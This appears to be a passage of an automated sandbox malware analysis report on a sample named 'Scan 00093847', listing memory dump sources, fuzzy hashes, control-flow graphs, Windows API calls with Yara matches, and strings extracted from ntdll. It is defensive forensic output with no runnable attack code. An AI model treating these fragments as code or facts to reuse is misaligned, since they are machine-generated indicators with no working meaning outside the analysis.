                                            • Opcode Fuzzy Hash: 263a018856bd53f3a24925714e62109ef072a133f53d107613e8e2df867c7a6b
                                            • Instruction Fuzzy Hash: 1AE1D9B4E002198FCB14DFA9C9809AEFBB2FF89304F24816AE415AB355D735AD41CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1841035781.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5410000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 324c5b1e09112b80aa201df67e4b63acd99313d1a335a7c241566669c0dc86a5
                                            • Instruction ID: c1c03bbe9ceb68fc01339997cd2759e3461e3b2fd764b765c35b781cf86ef085
                                            • Opcode Fuzzy Hash: 324c5b1e09112b80aa201df67e4b63acd99313d1a335a7c241566669c0dc86a5
                                            • Instruction Fuzzy Hash: 6EC109B04227468BD710CF65E85A1897FB9BB85328F95C32DE1A16F2E1DFB8144ACF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ff348da0b3da3b9b9f4797e4fdd7c05f49cf6d3fc70c2eb1ab4b1137c9044b68
                                            • Instruction ID: a60684d48f8b19a452fd48e626a2595e2ea0cb2b4150b43631f3c621cc5b9c6d
                                            • Opcode Fuzzy Hash: ff348da0b3da3b9b9f4797e4fdd7c05f49cf6d3fc70c2eb1ab4b1137c9044b68
                                            • Instruction Fuzzy Hash: A8512AB0E052199FCB14CFA9C9905AEBBB2FF89304F24C169D418BB356D7319942CFA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89dfebe111384e85a9f747dbaa0287283b999cdc1f679db31999ff8d8531d8b3
                                            • Instruction ID: 6b4c396bd71cbaa2861060b9f6d8af734d16996669f377f5859ab301e5b5b247
                                            • Opcode Fuzzy Hash: 89dfebe111384e85a9f747dbaa0287283b999cdc1f679db31999ff8d8531d8b3
                                            • Instruction Fuzzy Hash: 95511DB4E052598FCB14CFA9C9805AEFBB2FF89304F24C16AD418AB356D7356941CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1846544327.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7a70000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5f210da1941bf109dbd2bc29aec0cafe72eef9e394e48fc4a183f61a4a344fb9
                                            • Instruction ID: 31362cd115683dbaf3f73f6606c3e617ec19e99b8f0d9fdfaf832fe541f09470
                                            • Opcode Fuzzy Hash: 5f210da1941bf109dbd2bc29aec0cafe72eef9e394e48fc4a183f61a4a344fb9
                                            • Instruction Fuzzy Hash: 4C5118B0E052199FCB14CFA9C9805AEBBB2FF89300F24C16AD418AB356D7359D41CF61

                                            Execution Graph

                                            Execution Coverage:1.5%
                                            Dynamic/Decrypted Code Coverage:4.3%
                                            Signature Coverage:6.7%
                                            Total number of Nodes:163
                                            Total number of Limit Nodes:14

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 197 417733-41774f 198 417757-41775c 197->198 199 417752 call 42f333 197->199 200 417762-417770 call 42f933 198->200 201 41775e-417761 198->201 199->198 204 417780-417791 call 42dcb3 200->204 205 417772-41777d call 42fbd3 200->205 210 417793-4177a7 LdrLoadDll 204->210 211 4177aa-4177ad 204->211 205->204 210->211
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                            • Instruction ID: 8e2604fe3315099ce7e6592766d58e4e85df4a541fcdf6f6d68356c2e9832f5c
                                            • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                            • Instruction Fuzzy Hash: CE0152B5E4020DA7DB10DBA1DC42FDEB3789B54308F4081A6E91897281F635EB488B95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 238 42c593-42c5cc call 404773 call 42d7c3 NtClose
                                            APIs
                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C5C7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction ID: 4730e45dc8a455a10bbaf9a925c332d30bf1f4e4369036d8bfc9a482ac9e8ca9
                                            • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction Fuzzy Hash: 30E046766102147BD220BB6ADC41F9B77ACEFC5B14F40441AFA18A7281C676BA1087A8
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                            • Instruction ID: 510a34855ed59ad2da894fcede28a886b3038c54b0ce0beeaaf4a74f38f17945
                                            • Opcode Fuzzy Hash: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
                                            • Instruction Fuzzy Hash: 7290023560561402E100715C8514706101597D0201F65C412E0824568DC7958A5166A3

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 252 10c2b60-10c2b6c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                            • Instruction ID: 9f5ff3559bc62bf12fa0474e16ba2f0976d70ae8b59dd015d69280f4fee66b9d
                                            • Opcode Fuzzy Hash: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
                                            • Instruction Fuzzy Hash: 58900265202510035105715C8414616401A97E0201B55C022E1414590DC52589916226

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 254 10c2df0-10c2dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                            • Instruction ID: acf2c8d1e2d96960b681eea5ca5cacdb14cebf6deb33b413c6205ea3aba0a92b
                                            • Opcode Fuzzy Hash: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
                                            • Instruction Fuzzy Hash: CD90023520151413E111715C8504707001997D0241F95C413E0824558DD6568A52A222

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 253 10c2c70-10c2c7c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                            • Instruction ID: 740b2f1bc921d13924461fa47c7379b5b344ed7290895cd18083d1d339512281
                                            • Opcode Fuzzy Hash: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
                                            • Instruction Fuzzy Hash: FB90023520159802E110715CC40474A001597D0301F59C412E4824658DC69589917222

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 413e32-413e3b 1 413ea2-413ebf 0->1 2 413e3d-413e40 0->2 3 413ec1-413ec8 1->3 4 413f1a-413f21 1->4 5 413e12-413e17 2->5 6 413e42-413e51 2->6 7 413eca-413ecc 3->7 8 413f3d-413f42 3->8 9 413f25 4->9 5->0 6->0 10 413e53-413e79 6->10 11 413ecd-413ed4 7->11 14 413f60-413f71 8->14 15 413f44-413f5e 8->15 12 413fa4-413fe2 call 42e6d3 call 42f0e3 call 417733 call 4046e3 9->12 13 413f27 9->13 16 413e7b-413e9f 10->16 17 413ede 10->17 11->9 19 413ed6-413eda 11->19 22 413fe6-41400d call 424e13 12->22 13->11 20 413f2a-413f3b 13->20 21 413f73-413f7a 14->21 14->22 15->14 16->1 19->17 20->8 21->12 31 41402d-414033 22->31 32 41400f-41401e PostThreadMessageW 22->32 32->31 34 414020-41402a 32->34 34->31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 3h8t0-08$3h8t0-08$a~V
                                            • API String ID: 0-2215303234
                                            • Opcode ID: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                                            • Instruction ID: 5f72fba8100ebba8870b20796ede5c15298c30b13232037c41d5cf2924e7c9ec
                                            • Opcode Fuzzy Hash: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                                            • Instruction Fuzzy Hash: EC510232D482996FCB12CF708CC2DDEBFB9DE42345B4840ADE4446B242D6298E07C7D5

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: 3h8t0-08$3h8t0-08
                                            • API String ID: 1836367815-1947605396
                                            • Opcode ID: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                                            • Instruction ID: e1e66dc98035f04d2431884f0e0db6d51c4b26c5f5f1261c7f2f59727122a13f
                                            • Opcode Fuzzy Hash: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                                            • Instruction Fuzzy Hash: 600104B1D0021C7AEB11AAE29C81DEF7B7CDF80398F408069FA04A7241D6784E068BB5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 51 413f9f-41401e PostThreadMessageW 53 414020-41402a 51->53 54 41402d-414033 51->54 53->54
                                            APIs
                                            • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: 3h8t0-08$3h8t0-08
                                            • API String ID: 1836367815-1947605396
                                            • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                                            • Instruction ID: 1603f725fde6bf5af95b6af14f59adfb275f0ca4856cf2d9dab87d41540ea272
                                            • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                                            • Instruction Fuzzy Hash: D6D0A732A4510865831355E56C41CFE7F7CD9C6755B0001A7EE04C4140F609491716E2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 212 417726-41772e 213 417730-41775c call 42f333 212->213 214 417793-4177a7 LdrLoadDll 212->214 218 417762-417770 call 42f933 213->218 219 41775e-417761 213->219 216 4177aa-4177ad 214->216 222 417780-417791 call 42dcb3 218->222 223 417772-41777d call 42fbd3 218->223 222->214 222->216 223->222
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                                            • Instruction ID: 9cb1692463f57b7dfc76d45307d73cb454a5d3a2701c0a14866b4d9e4b00da90
                                            • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                                            • Instruction Fuzzy Hash: 7CF0B475E4410DABDF10DAD4D881FDDB7B5EB54318F00C2E6ED1C9B280E531EA498B90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 233 42c8f3-42c934 call 404773 call 42d7c3 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,00416FB5,000000F4), ref: 0042C92F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                                            • Instruction ID: 7b60794ad80a06acb647eca91f5e56653821d3cfb1d91a0d0caff21413609de5
                                            • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                                            • Instruction Fuzzy Hash: 3BE06DB22042047BD610EF59EC41EDB77ACDFC5710F00441AF908A7281DB75B9108BB8

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 228 42c8a3-42c8e7 call 404773 call 42d7c3 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(?,0041E52E,?,?,00000000,?,0041E52E,?,?,?), ref: 0042C8E2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction ID: 75f7dc53d552a5dc80399bc2a89f24ad6a6ecd643c57ce83a987320a35da5cda
                                            • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction Fuzzy Hash: 95E06DB12042047BD610EF69EC41EAB37ACDFC5710F004419FE08A7242D770B9148AB9

                                            Control-flow Graph

                                            control_flow_graph 243 42c943-42c97f call 404773 call 42d7c3 ExitProcess
                                            APIs
                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,7D282D94,?,?,7D282D94), ref: 0042C97A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_Scan 00093847.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:

                                            Control-flow Graph

                                            control_flow_graph 248 10c2c0a-10c2c0f 249 10c2c1f-10c2c26 LdrInitializeThunk 248->249 250 10c2c11-10c2c18 248->250
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0107D2C3
                                            • @, xrefs: 0107D0FD
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0107D262
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0107D146
                                            • @, xrefs: 0107D313
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0107D196
                                            • @, xrefs: 0107D2AF
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0107D0CF
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                            Strings
                                            • apphelp.dll, xrefs: 01076496
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 010D9A01
                                            • LdrpInitShimEngine, xrefs: 010D99F4, 010D9A07, 010D9A30
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 010D9A2A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010D99ED
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010D9A11, 010D9A3A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010F02BD
                                            • RTL: Re-Waiting, xrefs: 010F031E
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010F02E7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            Strings
                                            • WindowsExcludedProcs, xrefs: 010A522A
                                            • Kernel-MUI-Language-Disallowed, xrefs: 010A5352
                                            • Kernel-MUI-Language-Allowed, xrefs: 010A527B
                                            • Kernel-MUI-Language-SKU, xrefs: 010A542B
                                            • Kernel-MUI-Number-Allowed, xrefs: 010A5247
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            Strings
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010B855E
                                            • LdrpInitializeProcess, xrefs: 010B8422
                                            • @, xrefs: 010B8591
                                            • minkernel\ntdll\ldrinit.c, xrefs: 010B8421
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            Strings
